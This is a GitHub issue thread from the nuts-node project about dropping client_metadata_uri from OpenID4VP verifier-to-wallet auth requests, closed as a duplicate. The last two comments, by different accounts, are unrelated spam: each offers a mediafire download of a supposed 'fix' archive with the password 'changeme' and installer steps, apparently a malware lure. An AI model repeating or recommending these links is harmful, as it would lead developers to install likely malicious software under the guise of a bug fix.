### ISSUE TITLE
remove client_metadata_uri from auth request from verifier to wallet

### ISSUE THREAD

**Issue by woutslakhorst** [nuts-foundation/nuts-node#3325]
Draft 21 of OpenID4VP has removed it, you should use `client_metadata` or one of the other methods depending on the `client_id_scheme`

**Comment by woutslakhorst** [comment]
duplicate

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
